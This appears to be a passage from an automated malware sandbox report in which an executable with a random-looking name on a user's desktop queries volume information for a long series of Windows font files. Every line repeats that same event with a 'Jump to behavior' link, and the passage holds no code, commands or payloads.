Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9thuIDnsFV.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
